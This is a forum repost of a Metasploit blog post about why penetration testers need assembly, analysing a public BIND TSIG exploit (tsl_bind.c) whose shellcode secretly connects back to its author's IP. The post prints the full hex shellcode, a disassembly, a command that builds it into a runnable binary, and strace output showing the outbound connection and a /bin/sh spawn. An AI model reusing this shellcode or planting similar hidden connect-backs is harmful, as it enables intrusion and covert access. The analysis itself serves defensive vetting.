begood Posted April 6, 2010 Report Posted April 6, 2010 This afternoon a question came up on the #metasploit IRC channel (irc.freenode.net). The questioner asked: "Should a good penetration tester know assembly?". This lead to some discussion about when and where assembly language skills become important in the scope of a penetration test. My normal response to "Should I learn [something]?" questions is always a resounding YES; it is hard to know too much as a penetration tester or system auditor.Little things, like knowledge of beginner mistakes in configuration files, can go a long way to a successful penetration test. In the case of assembly, it helps, just like everything else does, but its not always required or even used frequently. Assembly language programming is mandatory for developing your own exploits and for tweaking others, but for the most part, it is not the defining factor in whether you will gain access to a network.There is one critical task where deep knowledge of assembly (and C) is required; validating public exploits. Over the years, dozens of fake exploits have been released; some of these delete all of the files from the drive, while others install a persistent backdoor. There is one other class of backdoored exploits that you rarely hear about, but are still found on public exploit repositories. These exploits look correct, function correctly, but also provide the exploit author with access to the system you exploited. The tricky thing about these exploits is that to find the backdoor, you have to decode and understand the shellcode, which is invariably written in assembly language.Lets go through a real-life example. In 2001, Gustavo Scotti of Tamandua Laboratories (now Axur Information Security) released an exploit for the BIND TSIG buffer overflow vulnerability published by Network Associates (now McAfee). This exploit, named tsl_bind.c can still be found on a number of exploit repositories, including PacketStorm. This exploit looks and works as advertised, except for one tiny thing. Lets take a closer look at the Linux shellcode in this exploit:/* SHELLCODE - this is a connect back shellcode */u8 shellcode[]="\x3c\x90\x89\xe6\x83\xc6\x40\xc7\x06\x02\x00\x0b\xac\xc7\x46""\x04\x97\xc4\x47\xa0\x31\xc0\x89\x46\x08\x89\x46\x0c\x31\xc0\x89""\x46\x28\x40\x89\x46\x24\x40\x89\x46\x20\x8d\x4e\x20\x31\xdb\x43""\x31\xc0\x83\xc0\x66\x51\x53\x50\xcd\x80\x89\x46\x20\x90\x3c\x90""\x8d\x06\x89\x46\x24\x31\xc0\x83\xc0\x10\x89\x46\x28\x58\x5b\x59""\x43\x43\xff\x76\x20\xcd\x80\x5b\x4f\x74\x32\x8b\x04\x24\x89\x46""\x08\x90\xbd\x7f\x00\x00\x01\x89\x6e\x04\xc7\x06\x03\x80\x35\x86""\xb8\x04\x00\x00\x00\x8d\x0e\x31\xd2\x83\xc2\x0c\xcd\x80\xc7\x06""\x02\x00\x0b\xab\x89\x6e\x04\x90\x31\xff\x47\xeb\x88\x90\x31\xc0""\x83\xc0\x3f\x31\xc9\x50\xcd\x80\x58\x41\xcd\x80\xc7\x06\x2f\x62""\x69\x6e\xc7\x46\x04\x2f\x73\x68\x00\x89\xf0\x83\xc0\x08\x89\x46""\x08\x31\xc0\x89\x46\x0c\xb0\x0b\x8d\x56\x0c\x8d\x4e\x08\x89\xf3""\xcd\x80\x31\xc0\x40\xcd\x80";Nothing too sinister jumps out at first glance, but lets actually look at the instructions:00000000 3C90 cmp al,0x9000000002 89E6 mov esi,esp00000004 83C640 add esi,byte +0x4000000007 C70602000BAC mov dword [esi],0xac0b00020000000D C7460497C447A0 mov dword [esi+0x4],0xa047c49700000014 31C0 xor eax,eax[snip]00000058 7432 jz 0x8c0000005A 8B0424 mov eax,[esp]0000005D 894608 mov [esi+0x8],eax00000060 90 nop00000061 BD7F000001 mov ebp,0x100007f00000066 896E04 mov [esi+0x4],ebp00000069 C70603803586 mov dword [esi],0x863580030000006F B804000000 mov eax,0x4In the code above (see here for a full listing), we can see that there are actually TWO reverse connections. One which goes to 151.196.71.160 (0x97c447a0) and another that goes to 127.0.0.1 (0x7f000001). The 127.0.0.1 address is substituted when the exploit is run, but the first address is not. In essence, every time this exploit succeeds, it will provide you with a shell, but also connects back to the author's IP address and send a blob of information about the user running the exploit.If you pipe the shellcode into Metasploit's msfencode, you can see it in action:$ msfencode -e generic/none -a x86 -p linux -t elf -o tsl.bin < shellcode.raw$ chmod +x ./tsl.bin$ strace -f -qix ./tsl.bin[ Process PID=15282 runs in 32 bit mode. ]socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3connect(3, {sa_family=AF_INET, sin_port=htons(2988), sin_addr=inet_addr("151.196.71.160")}, 16write(3, "\3\2005\206\177\0\0\1\1\0\0\0", 12) = 12socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4connect(4, {sa_family=AF_INET, sin_port=htons(2987), sin_addr=inet_addr("127.0.0.1")}, 16) = 4dup2(4, 0) = 0dup2(4, 1) = 1execve("/bin/sh",...)= 0To add insult to injury, the backdoor IP gets the shellconnection first!In summary, if you are using exploits from public repositories for your penetration testing engagements, you do need to learn assembly code. Intel x86 is a must, but also any other architecture you happen to test (PowerPC, SPARC, ARM, etc).This is another reason to prefer the Metasploit Framework over an unveted public exploit. Every single exploit, encoder, nop generator, and payload in Metasploit has been reviewed by a member of the core team. A side effect of us converting public exploits into Metasploit modules is the review and analysis process. Public code is first broken down into the transport, vector, return address, and payload components, and each piece is then reimplemented using the Metasploit API. This process leads to reliable exploit code that doesn't depend on a specific payload or transport.Update: A few folks have asked about getting started guides for x86 assembly. The resource I find useful is the tutorial section of Linux Assembly project. Once you have the basics down, take a look through the shellcode directory of the Metasploit Framework and study up with the NASM Manual.Update: In addition to the comments below, the Programming From the Ground Up book was recommended, as well as the ASM Community web site.Update: Based on gscotti's comments below (the original author), I clarified the post to indicate that only a reverse connect is made, not an actual shell. His comment states that over 30,000 IPs connected back since he released it. hdmoore @ blog.metasploit.com Quote